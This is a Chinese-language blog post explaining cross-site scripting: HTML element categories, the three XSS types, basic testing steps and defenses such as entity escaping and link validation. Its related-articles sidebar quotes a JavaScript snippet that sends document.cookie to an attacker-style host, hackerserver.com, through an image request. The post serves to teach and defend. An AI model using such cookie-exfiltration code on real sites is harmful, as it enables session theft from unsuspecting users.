xss 漏洞讲解及应用

最新推荐文章于 2024-06-12 10:55:23 发布
最新推荐文章于 2024-06-12 10:55:23 发布
阅读量661 收藏 1
点赞数 1
分类专栏: PHP 文章标签: js javascript html css web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tryheart/article/details/109727587
版权

what xss

跨站脚本攻击–xss,是指攻击者通过在web页面中写入恶意脚本,造成用户在浏览页面的时候,控制用户浏览器进行操作的攻击方式。

xss 的本质上攻击的是浏览器的解析引擎,通过控制浏览器解析前端代码的输入输出达到攻击的目的。

HTML

HTML 5 大元素

空元素 没有闭合标签,代表有< input>,< area>,< img>,
,< link>…
空元素不能容纳任何元素内容,因为没有闭合标签。

原始文本元素 < script>< /script>,< style>< /style>…
原始文本元素只能容纳原始文本内容。

rcdata元素 < textarea>< /textarea>,< title>< /title>…
rcdata 可以容纳文本内容和字符引用。

外部元素 代表有< svg> 命名空间或者mathml 命名空间元素
可以容纳文本,cdata段,字符引用(&#60,&lt),其他元素和注释。

基本元素 可以容纳文本内容,字符引用,其他元素和注释。

JavaScript 运行的三个地方

1,HTML的< script>< /script> 标签之中。
2,HTML标签的事件属性之中,onclick、onerror
3,浏览器的console开发控制器中。

xss 测试

xss 漏洞原理

核心 输入输出
输入指的是攻击者对服务器网页输入恶意代码,输出指的是浏览器接收到恶意代码后能解析并输出到前端。
xss的原理就是开发者没有对输入的内容进行过滤,导致攻击者输入的代码与前端原有代码发生混淆,形成新的页面语句,并且新的页面语句能被浏览器解析并输出。

xss 测试步骤

1,找到输入点,输入包含特殊字符的内容,单引号,尖括号。。。
2,打开网页源代码或查看页面元素,在源码中查看输出的位置。
3,根据浏览器解析输出的位置,来构造正确的攻击语句。

xss 的三大类型

反射型XSS:

只是简单地把用户输入的数据反射给浏览器,黑客需要诱使用户点击链接。当目标用户访问该链接时,服务器接收该用户目标的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。反射型XSS又称为非持久性XSS,这种攻击方式具有一次性。
要经过浏览器和服务器处理。

存储型XSS:

把用户输入的数据”存储“在服务器端。这种XSS具有很强的稳定性。比较常见的一个场景是,攻击者写下一篇包含恶意Javascript代码的博客文章,文章发表后,所有访问该博客文章的用户,都会在他们的浏览器中执行这段恶意的Javascript代码。黑客把恶意的脚本保存在服务器端。存储型XSS也叫持久性XSS。
也要经过浏览器和服务器。

DOM XSS:

不与后台服务器进行交互,是一种通过 dom 操作前端代码输出的时候产生的问题,实际上也是一种放射性xss。

xss 的防御

只要进行实体字符转义就能防止xss吗?
不能。一般的话,实体字符转义只能防范输出在元素内容里面的特殊符号。也有< svg>的黑魔法可以绕过< script>元素内容中的字符实体转义。
还有字符实体转义不能防御输出在属性内的特殊符号,比如通过href="javascript:alert(1)"这种就无法防御。

xsS的防御主要以下3点:

1、使用htmlspecialchars()函数做实体字符转义;
2、对一些链接输出点做校验,必须规定开头是http://或https://的字符串;
3、过滤类似< svg>的特殊标签。

对输入进行过滤,对输出进行转译。

星辰流炎
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
xss注入讲解ppt.pptx
08-10
xss 是一种常见的 web 应用安全漏洞,能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,从而达到恶意攻击用户的目的。xss 可以追溯到上世纪 90 年代,已经超过缓冲区溢出成为最流行的攻击方式。 xss 的...
XSS漏洞
04-05
博客链接提到的“https://0001111.iteye.com/blog/1440168”可能是一个关于XSS漏洞防范的详细讨论,虽然具体内容无法直接提供,但我们可以根据这个话题来深入讲解XSS的相关知识。 XSS攻击主要分为三类:反射型XSS、...
xss】攻击
qq_32265719的博客
10-15 210
xss sql注入攻击服务器和数据库 Click劫持 相对链接劫持 // js 层面 xss 攻击代码 列如 var i=document.createElement("img"); document.body.appendChild(i); i.src = "http://www.hackerserver.com/?c=" + document.cookie; 方案 1...
XSS介绍
MichaelJY1991的专栏
04-08 1003
安全漏洞——沉睡的巨人XSS Cross-site scripting,跨站脚本攻击,简写XSS(因为首字母缩写与CSS样式表重复,故采用XSS)。 背景 Web程序安全问题依赖于很多机制,其中就包括“同源策略”。同源策略是指调用方与被调用方需是同一地址,否则浏览器会阻止其调用。 XSS脚本攻击主要集中在web系统、其所在服务器以及相关依赖系统。利用这其中的一个漏洞,攻击者可以把恶意内容从...
【网络安全】XSS漏洞- XSS基础概述及利用
最新发布
goldfish8848的博客
06-12 1083
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
XSS漏洞详解
weixin_43939527的博客
05-27 2230
每天一个小知识之GET、POST区别 1、GET是从指定的资源请求数据,POST是向指定的资源提交要被处理的数据。 2、GET参数是带在URL后面,POST请求放在请求体Request Body中。 3、GET方法提交的数据大小长度有限制,POST方法没有对长度进行限制。 HTTP协议规范没有对URL长度进行限制。GET方法提交数据大小的限制是特定的浏览器及服务器对它的限制。IE对URL长度的限制是2083字节(2K+35) 4、GET请求能够被cache,POST不进行缓存。 GET请求能够被保存在浏览.
网络安全———XSS漏洞综述
VN520的博客
02-27 829
XSS(也称为跨站脚本攻击)是一个web安全漏洞,它允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过隔离不同网站的同源策略。跨站点脚本漏洞通常允许攻击者伪装成受害用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害用户在应用程序中拥有最高权限,那么攻击者就可能获得对所有应用程序功能和数据的完全控制。
XSS漏洞的利用
LizePing_的博客
07-29 4719
XSS的利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
通过代码审计找出网站中的XSS漏洞实战
02-24
反向审计打蛇打七寸,说明在关键位置做事效率会更高,代码审计找出漏洞也是同理,因此笔者需要找出XSS关键的位置;对于目前的大多数Web应用来说,MVC模式是非常主流的一种形式,因此笔者这里将找到对应的控制器和模板...
Web安全测试之XSS实例讲解
09-01
修复XSS漏洞通常涉及以下几个步骤:对用户输入进行严格的验证和过滤,使用HTTP-only Cookie来防止Cookie被JavaScript读取,以及在服务器端和客户端实施内容安全策略(Content Security Policy,CSP)来限制可执行的...
揭秘qq漏洞应用系列教程
09-05
本系列教程将深入探讨“QQ漏洞应用”,揭示其中蕴含的技术细节与安全问题。我们将会从以下几个方面详细讲解: 1. **QQ漏洞基础理解**:首先,我们需要了解什么是漏洞。在计算机科学中,漏洞是指软件或系统中存在的...
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 3771
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
XSS漏洞利用方式总结
XunanSec的博客
05-21 4785
前言: 最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。 00×1什么是XSS漏洞XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​ 00×2 XSS漏洞有什么危害: 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 ...
XSS漏洞三大类型
一醉一休的博客
03-03 6561
(1)跨站脚本( Crbss - Site Script ),为了跟层叠样式表( Css )区分开来,简称 xss,它是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种 (2)产生原因: XSS的产生是由于 WEB应用程序对用户输入的过滤不足而产生的,攻击者利用该漏洞把恶意脚本注入到网页之中,当其他用户浏览网页时,就会执行其中的恶意代码。受害用户可能会被窃取cookie 、会话劫持,钓鱼等各种攻击 (3)XSS漏洞常出现的位置:各种留言板,搜索框,备注,反馈意见,评论处等等 (4)pikac
XSS详解及其利用方式
读书 买花 长大
11-14 3930
XSS-xss
XSS漏洞利用方式汇总
热门推荐
Kevin's Blog
05-04 1万+
文章目录一、窃取Cookie1.1 解释1.2 操作搭建xss平台二、 以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!! 一、窃取Cookie 1.1 解释   恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。 1.2 操作 搭建xss平台 这里我直接百度使用一个xss平台来接Cookie Tips:为了安全...
黑客学习-xss漏洞总结
weixin_49349476的博客
06-06 1089
XSS攻击全称跨站脚本攻击,是一种在Web应用中常见的安全漏洞,它允许用户将恶意代码植入到Web页面中,当其他用户访问此页面时,植入的恶意脚本就会在其他用户的客户端中执行。是为了不和层叠样式表的缩写混淆,故将跨站脚本攻击缩写为XSS。导致xss漏洞存在有几个原因对用户提交的数据未进行充分验证和过滤,如未对特殊字符和标签进行转义,导致恶意脚本被注入到Web页面中。
xss漏洞利用方式总结
zlloveyouforever的博客
10-13 2512
XSS漏洞利用方式简单总结。有问题的同学请私信我,文章中网页挂马这一部分确实比较难实现。 此平台优点:界面布局清新、数据可阅读性好、IP获取准确、IP地址定位精准、轻量级(无需数据库)、对数据存储进行加密、GitHub开源方便与开发者交流(生命周期长)。 可以看到,BlueLotus平台还提供了一些js模板,便于我们参考或者构
xss漏洞
weixin_59762059的博客
07-04 715
登录:http://192.168.200.129/06/vul/xss//xssblind/admin_login.php。输入的参数没有被过滤。alert(‘xss’)// 单引号闭合前面 //注释后面字。登录//192.168.200.129/01/vulnerabilities/xss_s/网站,抓包;存储型 xss 代码分析中,看到留言的 inster into 语句中,直接插入留言信息,将如下代码植入怀疑出现xss的地方(注意’的转义),即可在 项目内容 观看XSS效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值